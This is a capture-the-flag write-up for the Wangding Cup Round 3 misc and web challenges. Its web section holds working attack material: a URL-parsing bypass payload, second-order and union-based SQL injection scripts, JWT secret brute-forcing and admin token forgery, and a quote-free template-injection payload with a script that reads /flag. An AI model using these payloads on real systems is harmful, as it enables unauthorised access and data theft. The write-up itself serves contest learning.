"网鼎杯" (Wangding Cup) Round 3 Write-up

MISC

Not_only_base

Rail fence cipher
BASE32

track_hacker

Filter the HTTP stream; a shell was uploaded.
This shell was executed 4 times in total.
The last request contains cat /flag.txt.
Decode the compressed result.

dewas

hint: play FPS games often? (wrap the flag in flag{})

ddssdssdssdssdssdssdswdwwdwwdwwdwwddssdssdssdssdswdwwdwwdwwdwwdwwdwwdedsssssssssssssedwdwwdwwdwwdwwdwwdwwddssdssdssdsaaaaaaaaddddddddsdssdssdsdedwwwedsddsdddsddddwdddwddwwawaaawaaawaaawaaawadwdwwdddwdddsdddsddsedddddwwwessssssssssssssddddwdddwddwddwddwdwwdwawwaawaawaawaaawaaaaeddddddddddddddddddesssssssssssssseddddddewwwwwwwwwwwwwwdssdssdssdssdssdssdssdwwwwwwwwwwwwwweddddddddddddddssssssewwawwawawaaasasassasssassdsssdsddsddddwdwwdwwwaaaeddddddssssssewdwdwdwdwdwdwdawawawawawawaweddddddddddeddddddddaaaaaaaasssssssddddddaaaaaassssssseddddddddddddwwwwwwwwwwwwwwessssssssssdssdsddsdddwddwdwwdwwwwwwwwwwedddddssssssssssssssewwwwwwwwwwwwwwdssdssdssdssdssdssdssdwwwwwwwwwwwwwwedddddesssssssssesssess

From the FPS hint, WASD are the direction keys and E is a break; drawing the path gives the flag.
My drawing was too ugly, so I did not draw the rest.
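An added example (not part of the write-up) that renders a WASD/E key log as ASCII art instead of drawing it by hand. It assumes W/A/S/D move one cell up/left/down/right and that E toggles the pen (a break between strokes), so moves made with the pen up are not drawn; SAMPLE is a constructed input, and the challenge string can be passed as the first argument.

```python
import sys

# Assumed key semantics: W/A/S/D move one cell, E toggles the pen up/down.
MOVES = {"w": (0, -1), "a": (-1, 0), "s": (0, 1), "d": (1, 0)}


def trace(keys: str) -> set:
    """Return the set of (x, y) cells visited while the pen is down."""
    x = y = 0
    pen_down = True
    drawn = {(x, y)}
    for key in keys.lower():
        if key == "e":
            pen_down = not pen_down
            if pen_down:
                drawn.add((x, y))    # a new stroke starts where the pen comes down
            continue
        dx, dy = MOVES[key]          # any other key is a malformed log (KeyError)
        x, y = x + dx, y + dy
        if pen_down:
            drawn.add((x, y))
    return drawn


def render(keys: str, ink: str = "#", blank: str = " ") -> list:
    """Rows of text, top to bottom, covering the bounding box of the drawing."""
    cells = trace(keys)
    xs = [x for x, _ in cells]
    ys = [y for _, y in cells]
    min_x, min_y = min(xs), min(ys)
    width, height = max(xs) - min_x + 1, max(ys) - min_y + 1
    rows = [[blank] * width for _ in range(height)]
    for x, y in cells:
        rows[y - min_y][x - min_x] = ink
    return ["".join(row) for row in rows]


# Constructed sample: an "L", a pen-up hop of two cells, then a vertical bar.
SAMPLE = "sssdd" + "e" + "dd" + "e" + "wwww"

if __name__ == "__main__":
    keys = sys.argv[1] if len(sys.argv) > 1 else SAMPLE   # pass the challenge key log here
    print("\n".join(render(keys)))
```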

mirror

hint: mirror reflection
Following the hint, the end of the file contains a reversed PNG file header.
Search for the keyword DNEI (IEND reversed) to find the PNG trailer.
Write a script that reverses the PNG data and saves it to get the flag image.

# The file is the PNG stored back to front (the reversed header sits at the tail and
# "DNEI" is IEND reversed), so reversing the byte order restores the image.
# mirror.hex is a placeholder name for a text file holding the file's hex dump.
with open('mirror.hex') as f:
    a = f.read().replace('\n', '').strip()

b = ""
for i in range(0, len(a), 2):          # take the hex pairs from the end, i.e. reverse the bytes
    b += a[len(a) - i - 2:len(a) - i]

with open('flag.png', 'wb') as f:      # write the decoded bytes, not the hex text
    f.write(bytes.fromhex(b))


Unpleasant_music

WEB

comein

Due to an ops mistake, an intranet authentication page was deployed to the public internet; fortunately the developer added domain validation.
Source code

// PHP parses a URL into its components with parse_url()
$url = "http://username:password@hostname/path?arg=value#anchor";

var_dump(parse_url($url));
array(7) {
  ["scheme"]=>
  string(4) "http"
  ["host"]=>
  string(8) "hostname"
  ["user"]=>
  string(8) "username"
  ["pass"]=>
  string(8) "password"
  ["path"]=>
  string(5) "/path"
  ["query"]=>
  string(9) "arg=value"
  ["fragment"]=>
  string(6) "anchor"
}

print_r(parse_url($url));
Array
(
    [scheme] => http
    [host] => hostname
    [user] => username
    [pass] => password
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)

This tests bypassing the parse_url / stripos check: when the "." is in the first position, stripos returns 0, which evaluates as false, so the stripos check is bypassed. Apache and parse_url also parse URLs differently: Apache treats 127.0.0.1..@alien.somewhere.meepwn.team/ as a directory, while parse_url treats it as a hostname, so ..//index.php has to be appended.
payload: .@c7f.zhuque.com/..//index.php
Reference articles: https://ctftime.org/writeup/10429?tdsourcetag=s_pctim_aiomsg
http://skysec.top/2017/12/15/parse-url%E5%87%BD%E6%95%B0%E5%B0%8F%E8%AE%B0/
http://pupiles.com/%E8%B0%88%E8%B0%88parse_url.html

phone

This is a second-order injection in the phone field of user registration. phone may only contain digits, so the payload is passed as a 0x hex literal. I solved it with time-based or boolean-based blind injection; payload: 1231312' or if(ascii(substr(database(),1,1))=98,1,False)# If the ASCII comparison is true it returns 1, so this phone number compares equal to every phone number; otherwise it equals none.
I wrote a registration script and a query script. First register a few thousand phone numbers carrying injection statements, then log in and query them one by one with the query script.
Registration script

# -*- coding:utf8 -*-
import requests
import binascii

url1 = "http://d8b2f5b882744df6af021400cc00974e2926ad42f4084dfa.game.ichunqiu.com/register.php"
## one account per (position, character) candidate of the f14g column ##
for a in range(1, 32):
    for i in range(40, 127):
        payload = "122222222222222' or if(ascii(substr((select f14g from flag),%d,1))=%d,1,False) #" % (a, i)
        # phone must be numeric, so the string is sent as a 0x hex literal
        db_payload = "0x" + binascii.b2a_hex(payload.encode("utf8")).decode("utf8")
        # 90001, 90002, ...: 87 candidates per position; the query script recomputes the same number
        name = 90000 + (a - 1) * 87 + (i - 40) + 1
        print(name)
        print(payload)
        da = {"username": name,
              "password": 123,
              "phone": db_payload
              }
        r = requests.post(url1, data=da)

Query script

# -*- coding:utf8 -*-
import requests

db_name = ""
url1 = "http://d8b2f5b882744df6af021400cc00974e2926ad42f4084dfa.game.ichunqiu.com/login.php"
url3 = "http://d8b2f5b882744df6af021400cc00974e2926ad42f4084dfa.game.ichunqiu.com/query.php"
## log in as each registered account and check which injected condition was true ##
for a in range(1, 32):
    for i in range(40, 127):
        # same numbering as the registration script (87 candidates per position)
        name = 90000 + (a - 1) * 87 + (i - 40) + 1
        da = {"username": name,
              "password": 123,
              }
        r = requests.post(url1, data=da)
        cook = r.cookies
        n = requests.post(url3, cookies=cook)
        print(n.text)
        if "0" not in n.text:       # condition true: character i is at position a
            db_name += chr(i)
            print(db_name)
            break

After the contest I read other write-ups and found that a direct union select injection works, which was crushing.
Get the table names:
aaa' union select group_concat(table_name) from information_schema.tables where table_schema=database() order by 1 desc#
Get the column names:
aaa' union select group_concat(column_name) from information_schema.columns where table_name="flag" order by 1 desc#
Get the field:
aaa' union select f14g from flag#
Note that order by 1 desc must be added, because the union query returns two rows, one 0 and one flag.

gold

Xiaoming, who is still in primary school, developed a game. Can you beat it?
Capturing with Burp Suite shows the browser keeps sending POST data, so the requests are probably made via Ajax:
The hint says: collect 1000 gold coins to pass. Setting the getGod parameter directly to 1000 triggers the detection mechanism.
So brute-force with the getGod parameter. Increasing by 1 coin per request always triggered detection halfway through, so I increased by 5 coins each time and got the flag at 1005.

i_am_admin

An article explaining how JWT is implemented
Capturing the login packet reveals a JWT.
After logging in, the secret key used for signing can be found.
Use this secret key on https://jwt.io/ to generate the token for admin.
Access the site with that token to get the flag:

mmmmy

Capturing packets shows that JWT is used here again.

Only admin can post messages, so brute-force the secret.
Then forge an identity as admin.
Whatever you enter is printed verbatim on the page, so I guessed this is an SSTI. Filtered: ' " os _ {{
{{ is filtered, but {% can still be used, for example {% if 1 %}1{%endif%}, which prints 1
payload: text={% if open('/flag','r').read()[0]=='f' %}1{% else %}0{% endif %}
Single and double quotes are filtered; the following payload bypasses that:
text={% if request.values.e[18] == ()[request.values.a][request.values.b][request.values.c]()[40](request.values.d).read()[0]%}good{%endif%}&a=__class__&b=__base__&c=__subclasses__&d=/flag&e=}-{0123456789abcdefghijklmnopqrstuvwxyz
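An added example, not part of the write-up: a standard-library HS256 JWT encoder and verifier that shows what jwt.io did with the leaked secret in i_am_admin and what the secret brute-force in mmmmy actually checks, namely which candidate secret validates a captured token. SECRET, TOKEN and the candidate list are constructed; only the claims of the write-up's own token are decoded.

```python
import base64
import hashlib
import hmac
import json


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_hs256(claims: dict, secret: str) -> str:
    """header.payload.signature, the same layout jwt.io produces for HS256."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [_b64url_encode(json.dumps(p, separators=(",", ":")).encode())
             for p in (header, claims)]
    sig = hmac.new(secret.encode(), ".".join(parts).encode(), hashlib.sha256).digest()
    return ".".join(parts + [_b64url_encode(sig)])


def claims_unverified(token: str) -> dict:
    """Claims are only base64url-encoded, not encrypted: anyone can read them."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def verify_hs256(token: str, secret: str):
    """Return the claims if the signature is valid under `secret`, else None.
    The algorithm is pinned to HS256 and the comparison is constant-time."""
    try:
        h, p, s = token.split(".")
        if json.loads(_b64url_decode(h)).get("alg") != "HS256":
            return None
        expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(s)):
            return None
        return json.loads(_b64url_decode(p))
    except ValueError:          # malformed token, bad base64 or bad JSON
        return None


def weak_secret(token: str, candidates):
    """The check behind 'brute-forcing the secret': the first candidate that validates."""
    return next((c for c in candidates if verify_hs256(token, c) is not None), None)


SECRET = "s3cret"                                        # constructed, deliberately weak
TOKEN = encode_hs256({"username": "guest"}, SECRET)      # constructed session token

if __name__ == "__main__":
    print(TOKEN, claims_unverified(TOKEN))
    print("recovered secret:", weak_secret(TOKEN, ["123456", "password", "s3cret"]))
```

Once the secret is known, encode_hs256({"username": "admin"}, SECRET) verifies like any legitimate token, which is exactly why a leaked or guessable signing key defeats the whole scheme.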
getflag.py

import requests, sys

url = "http://4532bc69bc734acd8416204f0aa04f446e9d38024c5644e8.game.ichunqiu.com/bbs"
cookie = {
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.IXEkNe82X4vypUsNeRFbhbXU4KE4winxIhrPiWpOP30"   # forged admin JWT
}
chars = "}-{0123456789abcdefghijklmnopqrstuvwxyz"
flag = ''
for i in range(0, 50):                      # i: position in the file
    for j in range(0, len(chars)):          # j: candidate character
        # quotes are filtered, so every string comes in through request.values;
        # {% if %} leaks one comparison per request
        data = {
            "text": "{%% if request.values.e[%d] == ()[request.values.a][request.values.b][request.values.c]()[40](request.values.d).read()[%d]%%}getflag{%%endif%%}" % (j, i),
            "a": "__class__",
            "b": "__base__",
            "c": "__subclasses__",
            "d": "/flag",
            "e": chars
        }
        r = requests.post(url=url, data=data, cookies=cookie)
        if 'getflag' in r.text:
            flag += chars[j]
            sys.stdout.write("[+] " + flag + '\r')
            sys.stdout.flush()
            if chars[j] == '}':             # closing brace: the flag is complete
                print(flag)
                sys.exit()
            else:
                break
print(len(r.text))


Reference articles

https://xz.aliyun.com/t/2648#toc-5

网鼎杯 (Wangding Cup) Round 3 wp


https://qvq.im/archive/%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E4%B8%89%E5%9C%BA%20mmmmy%20writeup